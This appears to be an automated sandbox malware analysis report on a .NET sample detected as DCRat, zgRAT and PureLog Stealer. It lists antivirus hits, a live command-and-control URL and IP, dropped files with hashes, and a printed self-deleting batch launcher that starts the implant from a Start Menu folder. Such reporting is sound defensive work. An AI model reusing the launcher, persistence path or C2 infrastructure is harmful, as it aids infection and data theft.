C:\Users\user\Desktop\GrWSIakL.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\HJAvhXOf.log | 25% | ReversingLabs
C:\Users\user\Desktop\HPmLzFXY.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\HgsdOaRa.log | 8% | ReversingLabs
C:\Users\user\Desktop\HhaNcSpz.log | 33% | ReversingLabs | Win32.Ransomware.Bitpy
C:\Users\user\Desktop\HxVaNNSD.log | 8% | ReversingLabs
C:\Users\user\Desktop\IJUlMoHw.log | 13% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\IQFswXwL.log | 8% | ReversingLabs
C:\Users\user\Desktop\IQXUcfJd.log | 21% | ReversingLabs
C:\Users\user\Desktop\ITPCmwoz.log | 29% | ReversingLabs | Win32.Trojan.Generic
C:\Users\user\Desktop\IgGVBfqZ.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\IzyaiCCJ.log | 25% | ReversingLabs
C:\Users\user\Desktop\JQrKHwDu.log | 6% | ReversingLabs
C:\Users\user\Desktop\JRYtVobT.log | 8% | ReversingLabs
C:\Users\user\Desktop\JapvNPbx.log | 25% | ReversingLabs
C:\Users\user\Desktop\JnnBaKLz.log | 8% | ReversingLabs
C:\Users\user\Desktop\JvdSwEFX.log | 21% | ReversingLabs
C:\Users\user\Desktop\KDDLYXsV.log | 6% | ReversingLabs
C:\Users\user\Desktop\KFIMcleA.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\KGTKXJkx.log | 17% | ReversingLabs
C:\Users\user\Desktop\KMbLIKLR.log | 13% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\KszcatAz.log | 33% | ReversingLabs | Win32.Ransomware.Bitpy
C:\Users\user\Desktop\LBCkjtUW.log | 21% | ReversingLabs
C:\Users\user\Desktop\LESjjfMz.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\LEvStJys.log | 12% | ReversingLabs
C:\Users\user\Desktop\LGJlUtwq.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LNSSdwSp.log | 13% | ReversingLabs
C:\Users\user\Desktop\LOtDzcWv.log | 17% | ReversingLabs
C:\Users\user\Desktop\LfVByPYY.log | 12% | ReversingLabs
C:\Users\user\Desktop\MKncHkNR.log | 12% | ReversingLabs
C:\Users\user\Desktop\MbPZGXOu.log | 4% | ReversingLabs
C:\Users\user\Desktop\Mdbejyft.log | 17% | ReversingLabs
C:\Users\user\Desktop\MjzskGoA.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                            No Antivirus matches
                            No Antivirus matches
Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://194.135.20.4/8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://194.135.20.4 | wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2457880910.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2623891999.0000000003109000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003519000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2832013910.0000000003436000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2928116039.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3170462126.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3290140159.0000000003AE3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://194.135.20.4/8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3P | wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | teh76E2k50.exe, 00000000.00000002.2305640506.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2457880910.0000000003248000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2623891999.000000000305B000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003519000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2832013910.0000000003388000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2928116039.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3170462126.000000000392C000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3290140159.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002EDF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
194.135.20.4 | unknown | Russian Federation | | 49392 | ASBAXETNRU | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1547568
                                    Start date and time:2024-11-02 17:46:14 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 12m 57s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:60
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:teh76E2k50.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:832D64C5F330BE9505301104FCFC574A.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@88/326@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 20.190.160.17, 40.126.32.68, 20.190.160.14, 40.126.32.74, 20.190.160.22, 20.190.160.20, 40.126.32.138, 40.126.32.140
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                    • Not all processes were analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: teh76E2k50.exe
Time | Type | Description
12:47:47 | API Interceptor | 9x Sleep call for process: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe modified
                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | ggS4R1gR04.exe | malicious | CobaltStrike | 199.232.214.172
bg.microsoft.map.fastly.net | 7rfw2HqJjJ.exe | malicious | CredGrabber, Meduza Stealer | 199.232.214.172
bg.microsoft.map.fastly.net | SecuriteInfo.com.Win64.MalwareX-gen.24264.25314.exe | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | https://parrots-run-fjh.craft.me/kKsdDph47M82kH | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | ahMvIr4vjN.exe | malicious | AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | WlewaiA251.exe | malicious | AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | ZUT3KQwo87.exe | malicious | AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | OQQZ5w8pzt.exe | malicious | AsyncRAT | 199.232.214.172
bg.microsoft.map.fastly.net | 22PwsPNUJm.exe | malicious | AsyncRAT | 199.232.214.172
bg.microsoft.map.fastly.net | cJigU4ar7m.exe | malicious | AsyncRAT | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ASBAXETNRU | SecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exe | malicious | Xmrig | 45.89.228.144
ASBAXETNRU | bin.armv7l.elf | malicious | Mirai | 212.192.15.49
ASBAXETNRU | https://sub.investorscabirigroup.com/4WQbos10596ktJI775idiwtbqpkk1528WGTFCWTFRKDXPVO305927/749609o14 | malicious | Phisher | 45.147.195.16
ASBAXETNRU | https://sub.investorscabirigroup.com/4tBfEb10596UgJc775rrkvedqhmm1528ZICWGQLYSOBMUOM389951/749609V14 | malicious | Phisher | 45.147.195.16
ASBAXETNRU | 7p6TMfaWhQ.exe | malicious | Clipboard Hijacker, Cryptbot | 45.142.44.233
ASBAXETNRU | SecuriteInfo.com.Trojan.Siggen29.1091.19313.13427.exe | malicious | Xmrig | 45.89.228.144
ASBAXETNRU | ppc.elf | malicious | Mirai | 212.196.181.191
ASBAXETNRU | 1U8CPtG8ip.exe | malicious | Clipboard Hijacker, Cryptbot | 45.142.44.233
ASBAXETNRU | arm5.elf | malicious | Mirai | 212.196.181.184
ASBAXETNRU | na.elf | malicious | Unknown | 212.192.13.171
                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Desktop\AQotzTRR.log | FuWRu2Mg82.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AQotzTRR.log | auXl1Tzyme.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AQotzTRR.log | oLlotc8NO3.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AQotzTRR.log | qZoQEFZUnv.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AQotzTRR.log | w49A5FG3yg.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AQotzTRR.log | 9XHFe6y4Dj.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AQotzTRR.log | 12Vjq7Yv2E.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AQotzTRR.log | 7WyBcig6e3.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AQotzTRR.log | kBY9lgRaca.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AQotzTRR.log | lv961v43L3.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):153
                                                        Entropy (8bit):5.619539503780824
                                                        Encrypted:false
                                                        SSDEEP:3:sGXcdduWUOGpdNuLYr45R7HVtIRjcfiqWK4zSfg3MMBlpwMIIoEnYa:kP4pCZbH4AdMBleuZnt
                                                        MD5:203CFBD011D103D35663BE382586DF17
                                                        SHA1:B819E7B003812D5D32F534821F6C99E05C663218
                                                        SHA-256:6BB23CB2D61A72EE0D26A768833986EE31FB0CB71273DF9E2F68939C468B9536
                                                        SHA-512:6F11624BF4EB1A70157A1C2F9C5D28F70004F902434EDC2B958578ADD3D4EFB3CD423625182C38066B329435D24E290E5382318F73B6950E2617A3608E544E67
                                                        Malicious:false
                                                        Preview:MIObVbW2w4ZenYTScnZCxFcfhcvgVODbjx1uXDHeX8MUUHd8k6LVp4VGqt32qzgi085zhi4Yf4pz2HKa9x6ZDsvocuEoKOyhboeWMnbBBwzuPfNiid233HeIMQXweQOQGIXOnyNWV4XQ2AZ6hgFqW4nUJ
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3923968
                                                        Entropy (8bit):7.839804583223067
                                                        Encrypted:false
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        MD5:832D64C5F330BE9505301104FCFC574A
                                                        SHA1:DE70A17B5E6F2186BB611E9BFACDCFE6B4FD9ED2
                                                        SHA-256:29472C5E2C502ED00E6E34E4C8EF71BE0E94A0971F548DF68689AAF23B8F1064
                                                        SHA-512:DE814A248871D7902E79E98C04DD1ADD6EA7C370EEA47BBF278CB433D0F0F7E201479DCD312A4FFB6AD94CE5C15F07FF17D4D156472B26EF2EE3C3A26BE87C4E
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with very long lines (508), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):508
                                                        Entropy (8bit):5.865907330286289
                                                        Encrypted:false
                                                        SSDEEP:12://FRSEwhggXGDo6NWeirpAv94cSOcGep3pchLcDpvja8mT:/tRx4GDhWRrps4ycGSWM+T
                                                        MD5:D70F6F25B3C4C098840B8FC566438D90
                                                        SHA1:C3F0E57FBD0DC2604592D9357842DB24C1910C24
                                                        SHA-256:1B7264C585C9C86186C98F2D89F7E2948FB9B8D821659E5F7D48BC5E7873601D
                                                        SHA-512:D1E83748F08044F659E3B24157582BCC7C802ED80A6E167864E33AFA79C8C71EDD7692C8A19E48C4AEA505626248F4D88CD7B9D65D5CDF291F338B4CF9C05A60
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3923968
                                                        Entropy (8bit):7.839804583223067
                                                        Encrypted:false
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        MD5:832D64C5F330BE9505301104FCFC574A
                                                        SHA1:DE70A17B5E6F2186BB611E9BFACDCFE6B4FD9ED2
                                                        SHA-256:29472C5E2C502ED00E6E34E4C8EF71BE0E94A0971F548DF68689AAF23B8F1064
                                                        SHA-512:DE814A248871D7902E79E98C04DD1ADD6EA7C370EEA47BBF278CB433D0F0F7E201479DCD312A4FFB6AD94CE5C15F07FF17D4D156472B26EF2EE3C3A26BE87C4E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with very long lines (509), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):509
                                                        Entropy (8bit):5.8708539501272
                                                        Encrypted:false
                                                        SSDEEP:12:ls2Hu0nIDzd1otvC/VWMxyglC1zqvP4DGKAb:ejvc6dkgMzoP4GLb
                                                        MD5:DB058200280DAF07361950FD6F019461
                                                        SHA1:307DABDDB86083F2323BC9865FE2A8AE0220C8F3
                                                        SHA-256:BBCEA2911D496B2EDA9CDE5F83CED8E5DF7F88DA2806894494654563939DC318
                                                        SHA-512:38F7320B2A938AC618CD1498034A62055AC8EEDD48478A15AD94A3FD3B72B3AFEC146200C9CB4A3614CC3FC7B05EBD4017A7FEBA4A9DEC3A50A16A7AEC98F546
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3923968
                                                        Entropy (8bit):7.839804583223067
                                                        Encrypted:false
                                                        SSDEEP:49152:zh3Lmrp7Qvsdng2u6ydyscQVnzrVGU14AyH9XsBgkpFvyA1nSiF:zhC54An5pydy/QVnv4K0HxAJzqA1SiF
                                                        MD5:832D64C5F330BE9505301104FCFC574A
                                                        SHA1:DE70A17B5E6F2186BB611E9BFACDCFE6B4FD9ED2
                                                        SHA-256:29472C5E2C502ED00E6E34E4C8EF71BE0E94A0971F548DF68689AAF23B8F1064
                                                        SHA-512:DE814A248871D7902E79E98C04DD1ADD6EA7C370EEA47BBF278CB433D0F0F7E201479DCD312A4FFB6AD94CE5C15F07FF17D4D156472B26EF2EE3C3A26BE87C4E
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):1698
                                                        Entropy (8bit):5.367720686892084
                                                        Encrypted:false
                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                        MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                        SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                        SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                        SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1915
                                                        Entropy (8bit):5.363869398054153
                                                        Encrypted:false
                                                        SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHpHNpaHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1Jtpaq2
                                                        MD5:73E7DD0D3AE6532ADBC6411F439B5DE3
                                                        SHA1:427BE8DB5338D856906C1DDFBD186319A02F7567
                                                        SHA-256:A80934D9E4D8FC0BBE46BD76A4FE0F66125C03B5A8F83265420242BE975DC8EE
                                                        SHA-512:33FD10A43B9E16EAF568113F7298D34A730D9040693473A15739AED86228828095E42E16617D06F52363F970D517AD7D052FE520A9924EEC0A93F657CB631855
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.213660689688186
                                                        Encrypted:false
                                                        SSDEEP:3:O0C5M6f4W:O0CS4
                                                        MD5:537A8666919E8656B242AEA480E905C2
                                                        SHA1:EAAA2CD2AC6413897414FD8427AE76D9A77416FD
                                                        SHA-256:8FBCA6DE4576111E3DB0FED5965710F6D891E1011C8C7A42BE8D2E336FA22C9E
                                                        SHA-512:3D5F2DA9468950E9B01EC11FB255527E99A2F3ACB566A6C2767E475A6B14F8FE893B51647FA0E96BBF7868B9206B8C3A02FAA56674B8D971F96D99A4E2599959
                                                        Malicious:false
                                                        Preview:LbEeQwgb9MjQ7FJTqHBwTnOTu
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.403856189774723
                                                        Encrypted:false
                                                        SSDEEP:3:neXqkCye:neaL3
                                                        MD5:30DC6C20F547862AF924588A2F58A0A7
                                                        SHA1:5CE9FDADA77451B21A36A0C8B073DC9F293B4196
                                                        SHA-256:1B7FA7E7DE22E71A6D4A008B51267F295AF1F70FD913FD66EB8DBD058F738D4F
                                                        SHA-512:27AA743D7F26CA91E8A6F14D9348A5325B77571F795D3CB580D6E87D17CBB8EDFC4EDA6F726B88F047ABDE0D1160DDDE8B24D87FC548B0ABA93E1D41D53A9C8B
                                                        Malicious:false
                                                        Preview:Shy89FNafuTgpn6GzC0CTsKux
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):260
                                                        Entropy (8bit):5.28344255759202
                                                        Encrypted:false
                                                        SSDEEP:6:hCijTg3Nou1SV+DE1JzmRXDJzPFKJSKOZG1923fKtkhn:HTg9uYDEiHAJIFn
                                                        MD5:425B95C4CE0FBF70915F6B2D7BB2D252
                                                        SHA1:52B8EB53276FA5009C9BF12F12841507848A6DEA
                                                        SHA-256:532A1ABB4B0284062B00EF72DDC1FFDB8CFB96598C9B871125E66367D156D43A
                                                        SHA-512:F040A9803EA7D0A2B3A24FEC9CECF41873C76F54A13DF24E0BC9A3A395BA505A0D4A6EEE2AEA4200358A823877AAA9D99CD2E2C3E5EC0C05A9A39D7E2800E11F
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8JExSyzmRo.bat"
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):25
                                                        Entropy (8bit):4.243856189774724
                                                        Encrypted:false
                                                        SSDEEP:3:eLQNk3Iv:e0h
                                                        MD5:4BF40B3272282CA0814D1A9E5D57A007
                                                        SHA1:4A2AB02ABA5ED7929DC6B2AEDC1040F47855B7DC
